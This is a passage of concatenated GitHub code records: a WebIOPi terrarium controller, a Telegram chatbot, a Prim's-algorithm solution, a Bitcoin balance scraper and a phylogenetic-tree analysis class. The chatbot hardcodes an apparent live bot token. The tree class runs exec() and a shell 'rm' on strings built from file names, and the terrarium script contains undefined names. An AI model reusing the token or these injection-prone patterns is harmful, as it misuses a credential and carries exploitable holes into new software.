function is repeatedly called by WebIOPi \ndef loop():\n hora = datetime.datetime.now()\n if (AUTO):\n\n # toggle light ON all days at the correct time\n if ((hora.hour == HoraLuzOn) and (hora.minute == 0) and (hora.second == 0)):\n if (GPIO.digitalRead(Pluz) == GPIO.LOW):\n GPIO.digitalWrite(Pluz, GPIO.HIGH)\n\n # toggle light OFF\n if ((hora.hour == HoraLuzOff) and (hora.minute == 0) and (hora.second == 0)):\n if (GPIO.digitalRead(Pluz) == GPIO.HIGH):\n GPIO.digitalWrite(Pluz, GPIO.LOW)\n\n #h,t = dht.read_retry(dht.DHT22, Dth)\n h=1\n t=25\n if tTmax:\n if (GPIO.digitalRead(Pcalefactor) == GPIO.LOW):\n GPIO.digitalWrite(Pcalefactor, GPIO.HIGH)\n if t>30:\n TemperaturaElevada = 1\n if (t<28) and (TemperaturaElevada == 1):\n TemperaturaElevada = 0 \n\n if (hora.hour==10 and hora.minute==50) or (hora.hour==12 and hora.minute==0) or (hora.hour==13 and hora.minute==50) or (hora.hour==16 and hora.minute==50) or (hora.hour==19 and hora.minute==50) or (hora.hour==22 and hora.minute==50):\n GPIO.digitalWrite(Plluvia, GPIO.LOW)\n time.sleep(30)\n GPIO.digitalWrite(Plluvia, GPIO.HIGH)\n if (TemperaturaElevada):\n GPIO.digitalWrite(Ppeltier, GPIO.LOW)\n\n\n # gives CPU some time before looping again\n webiopi.sleep(1)\n\n# destroy function is called at WebIOPi shutdown\ndef destroy():\n GPIO.digitalWrite(Pluz, GPIO.LOW)\n GPIO.digitalWrite(Pcascada, GPIO.LOW)\n GPIO.digitalWrite(Plluvia, GPIO.HIGH)\n GPIO.digitalWrite(Pcalefactor, GPIO.HIGH)\n GPIO.digitalWrite(Pluz, GPIO.HIGH)\n GPIO.digitalWrite(peltier, GPIO.HIGH)\n\n@webiopi.macro\ndef getTemperaturaHumedad():\n return \"%d;%d\" % (t, h)\n\n@webiopi.macro\ndef getLuzHours():\n return \"%d;%d\" % (HoraLuzOn, HoraLuzOff)\n\n@webiopi.macro\ndef setLuzHours(on, off):\n global HoraLuzOn, HoraLuzOff\n HoraLuzOn = int(on)\n HoraLuzOff = int(off)\n return getLuzHours()\n\n@webiopi.macro\ndef getTemperaturaLimits():\n return \"%d;%d\" % (Tmin, Tmax)\n\n@webiopi.macro\ndef setTemperaturaLimits(on, off):\n global Tmin, Tmax\n Tmin = int(on)\n Tmax = int(off)\n return getTemperaturaLimits()\n\n@webiopi.macro\ndef getModo():\n if (AUTO):\n return \"auto\"\n return \"manual\"\n\n@webiopi.macro\ndef setModo(modo):\n global AUTO\n if (mode == \"auto\"):\n AUTO = True\n elif (mode ==\"manual\"):\n AUTO = FALSE\n return getModo()\n","repo_name":"aguspa/TerrarioAutonomo","sub_path":"python/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":3798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"39522186624","text":"import requests\nimport time\nimport urllib\nimport ganster\n\n\nTOKEN = \"1060340522:AAHwgNAwVqc2ONPtzQX0TPvQjnFOss67xHA\"\nURL = f\"https://api.telegram.org/bot{TOKEN}/\"\n\n\ndef get_updates(offset=None):\n url = URL + \"getUpdates?timeout=100\"\n if offset:\n url = url + f\"&offset={offset}\"\n response = requests.get(url)\n js = response.json()\n return js\n\n\ndef get_last_update_id(updates):\n update_ids = []\n for update in updates[\"result\"]:\n update_ids.append(int(update[\"update_id\"]))\n return max(update_ids)\n\n\ndef get_last_chat_id_and_text(updates):\n num_updates = len(updates[\"result\"])\n last_update = num_updates - 1\n text = updates[\"result\"][last_update][\"message\"][\"text\"]\n chat_id = updates[\"result\"][last_update][\"message\"][\"chat\"][\"id\"]\n return text, chat_id\n\n\ndef reply_message(updates):\n for update in updates[\"result\"]:\n text = update[\"message\"][\"text\"]\n chat = update[\"message\"][\"chat\"][\"id\"]\n reply = ganster.reply_message(text)\n send_message(reply, chat)\n\n\ndef send_message(text, chat_id):\n text = urllib.parse.quote_plus(text)\n url = URL + f\"sendMessage?text={text}&chat_id={chat_id}\"\n requests.get(url)\n\n\ndef main():\n last_update_id = None\n while True:\n updates = get_updates(last_update_id)\n if len(updates[\"result\"]) > 0:\n last_update_id = get_last_update_id(updates) + 1\n reply_message(updates)\n time.sleep(0.5)\n\n\nif __name__ == '__main__':\n main()","repo_name":"Husainraza/Chatbot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"13917475424","text":"import subprocess\nimport os\n\nmy_env = os.environ.copy()\n# command = [\"helm\", \"install\", \"--name\", \"spark-user-\" + os.environ['USER'], \"--set\", \"user.name=\" + os.environ['USER'], \"--set\", \"cvmfs.enable=true\", \"--set\" , \"user.admin=false\", \"https://gitlab.cern.ch/db/spark-service/spark-service-charts/raw/spark_user_accounts/cern-spark-user-1.1.0.tgz\"]\n# command = [\"openstack\", \"token\", \"issue\", \"-c\", \"id\", \"-f\", \"value\"]\ncommand = [\"helm\", \"init\", \"--client-only\"]\np = subprocess.Popen(command, stdout=subprocess.PIPE, env=my_env)\nout, err = p.communicate()\nprint(out)\nprint(err)\n","repo_name":"sahiljajodia01/k8s-selection","sub_path":"k8s-selection/helm_chart_test.py","file_name":"helm_chart_test.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"69"}
+{"seq_id":"24510966989","text":"import heapq\n\nN = int(input())\nxy = []\nfor n in range(N):\n x, y = map(float, input().split())\n xy.append([x, y])\n\ngraph = [[] for _ in range(N)]\nfor i in range(N):\n for j in range(i + 1, N):\n cost = ((xy[i][0] - xy[j][0]) ** 2 + (xy[i][1] - xy[j][1]) ** 2) ** 0.5\n graph[i].append((cost, j))\n graph[j].append((cost, i))\n\nq = [(0, 0)]\nvisited = [0] * N\nans = 0\nwhile q:\n cost, now = heapq.heappop(q)\n if not visited[now]:\n visited[now] = 1\n ans += cost\n for next in graph[now]:\n heapq.heappush(q, (next[0], next[1]))\nprint(round(ans, 2))","repo_name":"dhkimxx/Baekjoon","sub_path":"python/4386.py","file_name":"4386.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"30718653156","text":"# -*-coding:utf-8 -*-\nimport requests\n\ndef is_zero_balance(balance):\n balance_float = 0.0\n if isinstance(balance, str):\n print(\"balance:{}\".format(balance))\n if len(balance) > 0:\n balance_float = float(balance)\n else:\n balance_float = balance\n \n return balance_float > 0\n\ndef get_bitcoin_balance(address):\n # 拼接链接\n url = \"\".join([\"https://www.blockchain.com/btc/address/\", address])\n response = requests.get(url)\n key_word = \"The current value of this address is\"\n key_len = len(key_word)\n text = response.text\n index = text.find(key_word)\n if index < 0:\n print(\"text:{} index: {} -----------can not find index-----------\".format(text,index))\n return 0;\n short = text[index:index+100]\n btc = short.find(\"BTC\")\n if btc < 0:\n print(\"******can not find btc******\")\n return 0;\n else:\n btc_banlance = short[key_len+1:btc-1]\n return btc_banlance\n\nif __name__ == \"__main__\":\n try:\n address = \"3JZHLAKwc291dnxjwLyDDfnmQkbTNwC7PX\"\n # address = \"bc1qcn6xjvfy6uqyqqnzmwxeqqtnk9cmtcpummn8la\"\n # address = \"36KKMy5yihkjNA4Rc21eA5TXy4wnfCGpj3\"\n btc_banlance = get_bitcoin_balance(address)\n \n if is_zero_balance(btc_banlance):\n print(\"find valide adress:\" + address)\n else:\n print(\"continu find!\")\n \n except Exception as err:\n print(\"error, \" + err)\n\n\n\n\n\n","repo_name":"wodingdong/genbtcaccount","sub_path":"genbtcaddr/get_bitcoin.py","file_name":"get_bitcoin.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"69"}
+{"seq_id":"74433518299","text":"__author__ = \"Andrea Rubbi\"\r\n\r\n# ─── About ────────────────────────────────────────────────────────────────────\r\n\"\"\"This file defines the tree_set and set_collection classes.\r\n tree_set contains the information relative to a single set of phyogenetic trees\r\n in newick format. It allows to compute the distance matrix using different methods and metrics.\r\n The distance matrix can be then embedded using different methods and subsequently plotted in 2D or 3D.\r\n A distance matrix and metadata can be given as .csv files. Moreover, metadata is modified\r\n in order to give information regarding the name of the tree set and the index (or step) of each tree.\r\n Please note that, once an instance of a class is generated, its metadata dataframe should not be substituted\r\n as this would invalidate it for the plotting functions. Addition of columns and features is possible by\r\n accessing the dataframe and modifying it as a pandas.DataFrame instance.\r\n set_collection behaves similarly to set_collection. Matter of fact, it is a subclass of the latter and therefore\r\n shares most of its methods. Its purpose is to analyze concurrently multiple instances of tree_sets and plot their\r\n relative distance in a common embedding. Examples of possible applications are present at: ###LINK###\"\"\"\r\n# ──────────────────────────────────────────────────────────────────────────────\r\n\r\n__copyright__ = \"2023-present Andrea Rubbi and other contributors\"\r\n__credits__ = [\"Andrea Rubbi\", \"Lukas Weilguny\", \"Nick Goldman\", \"Nicola de Maio\"]\r\n\r\n__license__ = \"MIT\"\r\n__maintainer__ = \"Andrea Rubbi\"\r\n__institute__ = \"EMBL-EBI\"\r\n__email__ = \"andrear@ebi.ac.uk\"\r\n__status__ = \"Production\"\r\n\r\n# ──────────────────────────────────────────────────────────────────────────────\r\nimport os\r\nimport random\r\nimport shutil\r\nimport subprocess\r\nimport sys\r\nimport time\r\nimport uuid\r\nimport warnings\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom rich import print\r\n# ? rich is a very nice library that allows to\r\n# ? easily format the output of console\r\n# ? https://github.com/Textualize/rich\r\nfrom rich.console import Console\r\n\r\n# getting the name of the directory\r\ncurrent = os.path.dirname(os.path.realpath(__file__))\r\n\r\n# Getting the parent directory name\r\nparent = os.path.dirname(current)\r\n\r\n# adding the parent directory to\r\n# the sys.path.\r\nsys.path.append(parent)\r\n\r\n# silencing some warnings\r\nfrom scipy.sparse import SparseEfficiencyWarning\r\n\r\n# importing other modules\r\n# try:\r\nfrom .calculate_distances import hashrf, maple_RF, tqdist\r\nfrom .embeddings import Isomap_e, LLE_e, PCA_e, tSNE_e\r\nfrom .embeddings.graph import graph\r\nfrom .interactive_mode import interactive\r\nfrom .subsample import subsample\r\n\r\n# except:\r\n# sys.exit(\"Error\")\r\n\r\n\r\nwarnings.filterwarnings(\"ignore\", category=DeprecationWarning)\r\nwarnings.filterwarnings(\"ignore\", category=UserWarning)\r\nwarnings.filterwarnings(\"ignore\", category=SparseEfficiencyWarning)\r\n\r\n\r\n# ────────────────────────────────────────────────────────── TREE_SET CLASS ─────\r\nclass tree_set:\r\n \"\"\"Class for the analysis of a set of phylogenetic trees\"\"\"\r\n\r\n # Console from rich -> takes control of console output\r\n console = Console()\r\n\r\n # ─── INIT ──────────────────────────────────────────────────────────────────\r\n def __init__(self, file, output_file=None, distance_matrix=None, metadata=None):\r\n \"\"\"Initialize tree_set\r\n\r\n file: mandatory - file with set of phylogenetic trees in newick format\r\n output_file: facultative - specifies output_file of distance matrix\r\n distance_matrix: facultative - specifies file with already-computed distance matrix\r\n metadata: facultative - specifies file containing additional information for each tree in set.\r\n It should contain a column for each feature, a row for each tree (blank row if no info)\r\n \"\"\"\r\n\r\n self.file = file\r\n self.output_file = output_file\r\n self.distance_matrix = distance_matrix\r\n self.metadata = metadata\r\n self.embedding_pca2D = None\r\n self.embedding_tsne2D = None\r\n self.embedding_pca3D = None\r\n self.embedding_tsne3D = None\r\n\r\n if self.output_file == None:\r\n self.output_file = \"./{file}_distance_matrix.csv\".format(\r\n file=os.path.splitext(os.path.basename(self.file))[0]\r\n )\r\n\r\n self.size = int(f\"{os.path.getsize(file)/(1<<30):,.0f}\")\r\n # if self.size > 3: sys.exit(f'File is too large: {self.size} GB')\r\n\r\n try:\r\n self.n_trees = int(\r\n subprocess.check_output([\"wc\", \"-l\", self.file]).decode().split(\" \")[0]\r\n )\r\n except:\r\n with open(file, \"r\") as f:\r\n self.n_trees = len(f.readlines())\r\n f.close()\r\n\r\n if type(self.distance_matrix) != type(None):\r\n try:\r\n self.distance_matrix = pd.read_csv(\r\n self.distance_matrix, header=None, index_col=None\r\n ).values\r\n # header=0,\r\n # index_col=0,\r\n # dtype=np.float32,\r\n # self.distance_matrix.columns = list(range(self.distance_matrix.shape[1]))\r\n except:\r\n sys.exit(\r\n \"There's an error with the Distance Matrix file - please check the correct location and name of the .csv file\"\r\n )\r\n\r\n if type(self.metadata) != type(None):\r\n try:\r\n self.metadata = pd.read_csv(self.metadata)\r\n except:\r\n sys.exit(\r\n \"There's an error with the Metadata file - please check the correct location and name of the .csv file\"\r\n )\r\n\r\n else:\r\n self.metadata = pd.DataFrame()\r\n self.metadata[\"SET-ID\"] = [\r\n os.path.splitext(os.path.basename(self.file))[0] for i in range(self.n_trees)\r\n ]\r\n self.metadata[\"STEP\"] = [i for i in range(self.n_trees)]\r\n self.sets = np.unique(self.metadata[\"SET-ID\"])\r\n\r\n # ─── STR ───────────────────────────────────────────────────────────────────\r\n def __str__(self):\r\n \"\"\"Returns string representation of tree_set\r\n\r\n Returns:\r\n __str__: summary of tree_set\r\n \"\"\"\r\n computed = \"not computed\"\r\n if type(self.distance_matrix) != type(None):\r\n computed = \"computed\"\r\n\r\n return f\"─────────────────────────────\\n Tree set containing {self.n_trees} trees;\\n File: {self.file};\\n Distance matrix: {computed}.\\n───────────────────────────── \\n\"\r\n\r\n # ─── CALCULATE DISTANCES ───────────────────────────────────────────────────\r\n def calculate_distances(self, method):\r\n \"\"\"Computes tree_set distance matrix with method of choice\r\n\r\n Args:\r\n method (str): method/algorithm used to compute distance matrix\r\n \"\"\"\r\n methods = {\r\n \"hashrf_RF\": hashrf.hashrf,\r\n \"hashrf_wRF\": hashrf.hashrf_weighted,\r\n \"smart_RF\": maple_RF.calculate_distance_matrix,\r\n \"tqdist_quartet\": tqdist.quartet,\r\n \"tqdist_triplet\": tqdist.triplet,\r\n \"None\": None,\r\n }\r\n\r\n with self.console.status(\"[bold green]Calculating distances...\") as status:\r\n self.distance_matrix = methods[method](\r\n self.file, self.n_trees, self.output_file\r\n )\r\n print(f\"[bold blue]{method} | Done!\")\r\n\r\n # ─── EMBED ─────────────────────────────────────────────────────────────────\r\n def embed(self, method, dimensions, quality=False, report=False):\r\n \"\"\"Compute embedding with n-dimensions and method of choice\r\n\r\n Args:\r\n method (str): method of choice to embed data\r\n dimensions (_type_): number of dimensions/components\r\n quality (bool, optional): returns quality report and self.emb_quality. Defaults to False.\r\n \"\"\"\r\n methods = {\r\n \"pca\": PCA_e.pca,\r\n \"tsne\": tSNE_e.tsne,\r\n \"isomap\": Isomap_e.isomap,\r\n \"lle\": LLE_e.lle,\r\n \"None\": None,\r\n }\r\n\r\n if type(self.distance_matrix) == type(None):\r\n self.calculate_distances(\"hashrf_RF\")\r\n\r\n dim = dimensions if dimensions > 2 else 3\r\n\r\n with self.console.status(\"[bold green]Embedding distances...\") as status:\r\n embedding = methods[method](\r\n self.distance_matrix,\r\n dim,\r\n self.metadata,\r\n quality=quality if not report else True,\r\n report=report,\r\n )\r\n print(f\"[bold blue]{method} | Done!\")\r\n\r\n if quality:\r\n if method == \"pca\":\r\n embedding, var, corr, self.emb_quality = embedding\r\n print(\r\n f\"With {dimensions} components/dimensions, the explained variance is {var:.2f},\\n with an estimated correlation {corr[0, 1]:.2f} with the {self.n_trees}-dimensional coordinates\"\r\n )\r\n else:\r\n embedding, corr, self.emb_quality = embedding\r\n print(\r\n f\"With {dimensions} components/dimensions, the estimated correlation with the {self.n_trees}-dimensional coordinates is {corr[0, 1]:.2f}\"\r\n )\r\n\r\n if method == \"pca\":\r\n self.embedding_pca = embedding\r\n self.embedding_pca3D = embedding[:, :4]\r\n self.embedding_pca2D = embedding[:, :3]\r\n\r\n elif method == \"tsne\":\r\n if dimensions > 3:\r\n warnings.warn(\r\n \"t-SNE with more than 3 dimensions can be considerably slow\"\r\n )\r\n self.embedding_tsne = embedding\r\n self.embedding_tsne3D = embedding[:, :4]\r\n self.embedding_tsne2D = embedding[:, :3]\r\n\r\n elif method == \"isomap\":\r\n if dimensions > 3:\r\n warnings.warn(\r\n \"Isomap with more than 3 dimensions can be considerably slow\"\r\n )\r\n self.embedding_isomap = embedding\r\n self.embedding_isomap3D = embedding[:, :4]\r\n self.embedding_isomap2D = embedding[:, :3]\r\n\r\n elif method == \"lle\":\r\n if dimensions > 3:\r\n warnings.warn(\"LLE with more than 3 dimensions can be considerably slow\")\r\n self.embedding_lle = embedding\r\n self.embedding_lle3D = embedding[:, :4]\r\n self.embedding_lle2D = embedding[:, :3]\r\n\r\n # ─── PLOT EMBEDDING ─────────────────────────────────────────────────────────\r\n\r\n def plot_2D(\r\n self,\r\n method,\r\n save=False,\r\n name_plot=None,\r\n static=False,\r\n plot_meta=\"SET-ID\",\r\n plot_set=None,\r\n select=False,\r\n same_scale=False,\r\n ):\r\n \"\"\"Plot 2D embedding performed with method of choice\r\n\r\n Args:\r\n method (str): embedding method\r\n save (bool, optional): save plot HTML. Defaults to False.\r\n name_plot (str, optional): name of plot's file. Defaults to None.\r\n static (bool, optional): return less interactive plot. Defaults to False.\r\n plot_meta (str, optional): meta-variale used to color the points. Defaults to \"SET-ID\".\r\n plot_set (list, optional): list of sets to plot from set_collection. Defaults to None.\r\n select (bool, optional): return set of buttons to show or hide specific traces. Defaults to False.\r\n same_scale (bool, optional): use same color_scale for all traces when scale is continuous. Defaults to False.\r\n\r\n Raises:\r\n ValueError: method can only be either pca or tsne for now\r\n\r\n Returns:\r\n plot: either interactive or not\r\n \"\"\"\r\n\r\n # you can surely write something better here @andrear\r\n if type(plot_set) == type(None):\r\n plot_set = self.sets\r\n if method == \"pca\":\r\n if name_plot == None:\r\n name_plot = \"PCA_2D\"\r\n if type(self.embedding_pca2D) == type(None):\r\n self.embed(\"pca\", 2)\r\n fig = graph.plot_embedding(\r\n self.embedding_pca2D,\r\n self.metadata,\r\n 2,\r\n save,\r\n name_plot,\r\n static,\r\n plot_meta,\r\n plot_set,\r\n select,\r\n same_scale,\r\n )\r\n\r\n elif method == \"tsne\":\r\n if name_plot == None:\r\n name_plot = \"TSNE_2D\"\r\n if type(self.embedding_tsne2D) == type(None):\r\n self.embed(\"tsne\", 2)\r\n fig = graph.plot_embedding(\r\n self.embedding_tsne2D,\r\n self.metadata,\r\n 2,\r\n save,\r\n name_plot,\r\n static,\r\n plot_meta,\r\n plot_set,\r\n select,\r\n same_scale,\r\n )\r\n\r\n elif method == \"isomap\":\r\n if name_plot == None:\r\n name_plot = \"ISOMAP_2D\"\r\n if type(self.embedding_isomap2D) == type(None):\r\n self.embed(\"isomap\", 2)\r\n fig = graph.plot_embedding(\r\n self.embedding_isomap2D,\r\n self.metadata,\r\n 2,\r\n save,\r\n name_plot,\r\n static,\r\n plot_meta,\r\n plot_set,\r\n select,\r\n same_scale,\r\n )\r\n\r\n elif method == \"lle\":\r\n if name_plot == None:\r\n name_plot = \"LLE_2D\"\r\n if type(self.embedding_lle2D) == type(None):\r\n self.embed(\"lle\", 2)\r\n fig = graph.plot_embedding(\r\n self.embedding_lle2D,\r\n self.metadata,\r\n 2,\r\n save,\r\n name_plot,\r\n static,\r\n plot_meta,\r\n plot_set,\r\n select,\r\n same_scale,\r\n )\r\n\r\n else:\r\n raise ValueError(\"'method' can only be either 'pca' or 'tsne' \")\r\n\r\n return fig\r\n\r\n def plot_3D(\r\n self,\r\n method,\r\n save=False,\r\n name_plot=None,\r\n static=False,\r\n plot_meta=\"SET-ID\",\r\n plot_set=None,\r\n select=False,\r\n same_scale=False,\r\n z_axis=None,\r\n ):\r\n \"\"\"Plot 3D embedding performed with method of choice\r\n\r\n Args:\r\n method (str): embedding method\r\n save (bool, optional): save plot HTML. Defaults to False.\r\n name_plot (str, optional): name of plot's file. Defaults to None.\r\n static (bool, optional): return less interactive plot. Defaults to False.\r\n plot_meta (str, optional): meta-variale used to color the points. Defaults to \"SET-ID\".\r\n plot_set (list, optional): list of sets to plot from set_collection. Defaults to None.\r\n select (bool, optional): return set of buttons to show or hide specific traces. Defaults to False.\r\n same_scale (bool, optional): use same color_scale for all traces when scale is continuous. Defaults to False.\r\n\r\n Raises:\r\n ValueError: method can only be either pca or tsne for now\r\n\r\n Returns:\r\n plot: either interactive or not\r\n \"\"\"\r\n if type(plot_set) == type(None):\r\n plot_set = self.sets\r\n if method == \"pca\":\r\n if name_plot == None:\r\n name_plot = \"PCA_3D\"\r\n if type(self.embedding_pca3D) == type(None):\r\n self.embed(\"pca\", 3)\r\n fig = graph.plot_embedding(\r\n self.embedding_pca3D,\r\n self.metadata,\r\n 3,\r\n save,\r\n name_plot,\r\n static,\r\n plot_meta,\r\n plot_set,\r\n select,\r\n same_scale,\r\n z_axis,\r\n )\r\n\r\n elif method == \"tsne\":\r\n if name_plot == None:\r\n name_plot = \"TSNE_3D\"\r\n if type(self.embedding_tsne3D) == type(None):\r\n self.embed(\"tsne\", 3)\r\n fig = graph.plot_embedding(\r\n self.embedding_tsne3D,\r\n self.metadata,\r\n 3,\r\n save,\r\n name_plot,\r\n static,\r\n plot_meta,\r\n plot_set,\r\n select,\r\n same_scale,\r\n z_axis,\r\n )\r\n\r\n elif method == \"isomap\":\r\n if name_plot == None:\r\n name_plot = \"ISOMAP_3D\"\r\n if type(self.embedding_isomap3D) == type(None):\r\n self.embed(\"isomap\", 3)\r\n fig = graph.plot_embedding(\r\n self.embedding_isomap3D,\r\n self.metadata,\r\n 3,\r\n save,\r\n name_plot,\r\n static,\r\n plot_meta,\r\n plot_set,\r\n select,\r\n same_scale,\r\n z_axis,\r\n )\r\n\r\n elif method == \"lle\":\r\n if name_plot == None:\r\n name_plot = \"LLE_3D\"\r\n if type(self.embedding_lle3D) == type(None):\r\n self.embed(\"lle\", 3)\r\n fig = graph.plot_embedding(\r\n self.embedding_lle3D,\r\n self.metadata,\r\n 3,\r\n save,\r\n name_plot,\r\n static,\r\n plot_meta,\r\n plot_set,\r\n select,\r\n same_scale,\r\n z_axis,\r\n )\r\n\r\n else:\r\n raise ValueError(\"'method' can only be either 'pca' or 'tsne' \")\r\n\r\n return fig\r\n\r\n # ─── GET SUBSET ───────────────────────────────────────────────────────\r\n\r\n def get_subset(self, n_required, method=\"sequence\"):\r\n \"\"\"Gets subset of phylogenetic trees\r\n\r\n Args:\r\n n_required (int): number of points to extract\r\n method (str, optional): method used to extact points ('sequence', 'random', 'syst'). Defaults to \"sequence\".\r\n\r\n Returns:\r\n subset plots: 2D and 3D embedding plots of subset\r\n \"\"\"\r\n console = Console()\r\n with console.status(\"[bold blue]Extracting subsample...\") as status:\r\n if method == \"syst\":\r\n if shutil.which(\"pypy3\") is not None:\r\n command = [\r\n \"pypy3\",\r\n f\"{current}/subsample/subsample.py\",\r\n self.file,\r\n str(self.n_trees),\r\n str(n_required),\r\n ]\r\n res = subprocess.check_output(command, universal_newlines=True).split(\r\n \"\\n\"\r\n )\r\n subsample_trees, idxs = eval(res[3]), eval(res[4])\r\n else:\r\n console.log(\r\n \"[bold red]Could not find pypy3 on your sytem PATH - using python3...\"\r\n )\r\n subsample_trees, idxs = subsample.subsample(\r\n self.file, self.n_trees, n_required, subp=False\r\n )\r\n\r\n else:\r\n with open(self.file, \"r\") as f:\r\n trees = list(enumerate(f.readlines()))\r\n f.close()\r\n\r\n if method == \"random\":\r\n selection = random.sample(trees, n_required)\r\n subsample_trees, idxs = list(\r\n map(lambda elem: elem[1], selection)\r\n ), list(map(lambda elem: elem[0], selection))\r\n elif method == \"sequence\":\r\n step = self.metadata.shape[0] // n_required\r\n idxs = [step * (i + 1) - 1 for i in range(n_required)]\r\n subsample_trees = [trees[i][1] for i in idxs]\r\n\r\n else:\r\n sys.exit(f\"Method {method} not available for subsampling\")\r\n\r\n file_sub = f\"SUBSAMPLE\"\r\n with open(file_sub, \"w\") as f:\r\n for i in subsample_trees:\r\n f.write(i)\r\n f.close()\r\n # print(len(subsample_trees), len(idxs))\r\n status.update(\"[bold green]Calculating distances...\")\r\n dM = hashrf.hashrf(file_sub, n_required, file_sub + \"_distances.csv\")\r\n components = PCA_e.pca(dM, 3)\r\n status.update(f\"[bold blue] Done!\")\r\n time.sleep(0.2)\r\n\r\n sorted_elements = sorted(enumerate(idxs), key=lambda x: x[1])\r\n idxs_sorted, order = list(map(lambda x: x[1], sorted_elements)), list(\r\n map(lambda x: x[0], sorted_elements)\r\n )\r\n comp_sorted = np.array([components[line, :] for line in order])\r\n # dM_sorted = np.array([dM[line,:] for line in order])\r\n SetID_sub = self.metadata[\"SET-ID\"][idxs_sorted]\r\n meta_sub = pd.DataFrame({\"SET-ID\": SetID_sub, \"STEP\": idxs_sorted})\r\n\r\n fig1, fig2 = graph.plot_embedding(comp_sorted, meta_sub, 2), graph.plot_embedding(\r\n comp_sorted, meta_sub, 3\r\n )\r\n return fig1, fig2\r\n\r\n\r\n# ──────────────────────────────────────────────────────────────────────────────\r\n# ─────────────────────────────────────────────────── SET_COLLECTION CLASS ─────\r\nclass set_collection(tree_set):\r\n # NB: set_collection is a sub_class of tree_set\r\n # therefore, most methods are shared between these two classes\r\n def __init__(\r\n self,\r\n collection=list(),\r\n file=\"Set_collection_\",\r\n output_file=None,\r\n distance_matrix=None,\r\n metadata=None,\r\n ):\r\n \"\"\"Initialize set_collection\r\n\r\n collection: facultative - tree_set or list of tree_sets\r\n NB: if no collection is given an empty set_collection is generated\r\n file: facultative - file with set of phylogenetic trees in newick format\r\n output_file: facultative - specifies output_file of distance matrix\"\"\"\r\n\r\n self.id = uuid.uuid4()\r\n self.file = file + str(self.id)\r\n self.distance_matrix = (\r\n pd.read_csv(distance_matrix, header=None, index_col=None).values #\r\n if distance_matrix\r\n else distance_matrix\r\n )\r\n self.embedding_pca2D = None\r\n self.embedding_tsne2D = None\r\n self.embedding_pca3D = None\r\n self.embedding_tsne3D = None\r\n\r\n if self.file != \"Set_collection_\" + str(self.id) and output_file is None:\r\n self.output_file = \"{file}_distance_matrix.csv\".format(\r\n file=os.path.splitext(os.path.basename(self.file))[0]\r\n )\r\n elif output_file is None:\r\n self.output_file = \"Set_collection_distance_matrix_\" + str(self.id) + \".csv\"\r\n else:\r\n if output_file[-4:] == \".csv\":\r\n self.output_file = output_file[:-4] + \"_\" + str(self.id) + \".csv\"\r\n else:\r\n self.output_file = output_file + \"_\" + str(self.id) + \".csv\"\r\n\r\n if isinstance(collection, tree_set):\r\n self.collection = [collection]\r\n with open(self.file, \"w\") as trees:\r\n with open(collection.file, \"r\") as file:\r\n trees.write(file.read())\r\n file.close()\r\n trees.close()\r\n\r\n elif len(collection) > 0:\r\n remove = list()\r\n for i, element in enumerate(collection):\r\n if not isinstance(element, tree_set):\r\n if isinstance(element, str):\r\n try:\r\n file = os.path.splitext(os.path.basename(element))[0]\r\n exec(f\"{file} = tree_set('{element}')\")\r\n remove.append(i)\r\n except FileNotFoundError:\r\n sys.exit(f\"File {element} not found\")\r\n except TypeError:\r\n sys.exit(\r\n f\"Set collection can be initialized only with set_collection, tree_set, or file path elements\"\r\n )\r\n exec(f\"collection.append({file})\")\r\n\r\n else:\r\n sys.exit(\r\n f\"Set collection can be initialized only with set_collection, tree_set, or file path elements\"\r\n )\r\n for i in remove[::-1]:\r\n collection.pop(i)\r\n\r\n self.collection = collection\r\n\r\n else:\r\n self.collection = collection\r\n\r\n self.data = dict()\r\n\r\n self.metadata = pd.DataFrame()\r\n self.n_trees = 0\r\n for set in self.collection:\r\n key = os.path.splitext(os.path.basename(set.file))[0]\r\n\r\n metadata = set.metadata\r\n if type(metadata) == type(None):\r\n metadata = pd.DataFrame()\r\n metadata[\"SET-ID\"] = np.array([key] * set.n_trees)\r\n\r\n self.metadata = pd.concat([self.metadata, metadata])\r\n\r\n self.data[key] = {\"metadata\": metadata, \"n_trees\": set.n_trees}\r\n self.n_trees += set.n_trees\r\n\r\n self.metadata.reset_index(drop=True, inplace=True)\r\n\r\n self.sets = np.unique(self.metadata[\"SET-ID\"])\r\n\r\n # ─── CALCULATE DISTANCES ───────────────────────────────────────────────────\r\n def calculate_distances(self, method):\r\n \"\"\"Computes tree_set distance matrix with method of choice\r\n\r\n Args:\r\n method (str): method/algorithm used to compute distance matrix\r\n \"\"\"\r\n methods = {\r\n \"hashrf_RF\": hashrf.hashrf,\r\n \"hashrf_wRF\": hashrf.hashrf_weighted,\r\n \"smart_RF\": maple_RF.calculate_distance_matrix,\r\n \"tqdist_quartet\": tqdist.quartet,\r\n \"tqdist_triplet\": tqdist.triplet,\r\n \"None\": None,\r\n }\r\n\r\n if method in (\"hashrf_RF\", \"hashrf_wRF\", \"tqdist_quartet\", \"tqdist_triplet\"):\r\n with open(self.file, \"w\") as trees:\r\n for set in self.collection:\r\n with open(set.file, \"r\") as file:\r\n trees.write(file.read())\r\n file.close()\r\n trees.close()\r\n\r\n with self.console.status(\"[bold green]Calculating distances...\") as status:\r\n self.distance_matrix = methods[method](\r\n self.file, self.n_trees, self.output_file\r\n )\r\n\r\n if method in (\"hashrf_RF\", \"hashrf_wRF\", \"tqdist_quartet\", \"tqdist_triplet\"):\r\n hashrf.bash_command(f\"rm {self.file}\")\r\n\r\n print(f\"[bold blue]{method} | Done!\")\r\n\r\n # the result of addition between two collections\r\n # is the concatenation of the two collections\r\n def __add__(self, other):\r\n \"\"\"Concatenates two collectionsor collection and tree_set\r\n\r\n Args:\r\n other (tree_set ot set_colletion): tree_set ot set_colletion\r\n\r\n Returns:\r\n set_collection: concatenated set_collection\r\n \"\"\"\r\n if isinstance(other, set_collection):\r\n return set_collection(self.collection + other.collection)\r\n elif 